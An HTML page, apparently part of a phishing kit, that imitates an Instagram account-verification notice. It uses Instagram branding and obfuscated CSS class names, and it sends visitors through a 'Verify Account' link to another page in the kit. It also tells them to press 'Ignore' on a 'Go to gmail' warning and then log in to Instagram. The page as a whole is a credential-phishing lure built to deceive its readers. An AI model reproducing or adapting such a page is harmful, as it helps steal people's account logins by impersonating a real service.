<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=DM+Sans:ital,opsz,wght@0,9..40,300;0,9..40,400;0,9..40,500;0,9..40,600;0,9..40,700;0,9..40,800;0,9..40,900;1,9..40,400&family=Manrope:wght@400;500;600;700;800&family=Playfair+Display:ital,wght@0,400;0,600;1,400;1,600&family=Poppins:wght@400;500;600;700;800&family=Share+Tech&family=Share+Tech+Mono&display=swap" rel="stylesheet">

    <title>Instagram Verification</title>
</head>
<style>
    *{
        font-family: 'Poppins', sans-serif;
    }
   .cont{
    padding: 12px;
    border: 1px solid rgb(221, 221, 221);
    box-shadow: rgba(0, 0, 0, 0.05) 0px 6px 24px 0px, rgba(0, 0, 0, 0.08) 0px 0px 0px 1px;
    display: flex;
    justify-content: center;
    align-items: center;
    margin: 0.8rem;
    flex-direction: column;
    padding: 1rem;
   }

   .bh-7mxCm{
    color: black;
    text-align: center;
    
    line-height: 1;
    font-size: 38px;
    font-weight: bold;
   }
   .vx-inxo{
padding: 15px;
border-radius: 15px;
background-color: #3897f0;   
text-decoration: none;
font-weight:700; 
color: white;
}
.vx-inxo:hover{
    background-color: #1284ee; 
}
.Cvgr-u{
    text-align: center;
    position: absolute;
    bottom: 0;
  
    left: 50%;
    transform: translate(-50%, -50%);
}
  .Mc-X6vhg-Ghv{
    margin-top: 3rem;
  }
</style>
<body>
    
<div class="cont">
    <h3 class="bh-7mxCm">
        You'll need to verify your account for furthur security.
    </h3>

    <a href="main.html" class="vx-inxo">Verify Account</a>

    <div class="Mc-X6vhg-Ghv">
        <ul>
            <li>Click on <strong>"Verify Account"</strong> Button.</li>
            <li>After Clicking if you see a page saying <strong>"Go to gmail"</strong>. below this text there is a <strong>"Ignore"</strong> Button, press that button!</li>
            <li>Log In to your instagram account</li>
            <li>Verification Successful.</li>
           
        </ul>
    </div>


    <a href="#" class="Cvgr-u">Instagram from  Meta</a>
</div>




</body>
</html>
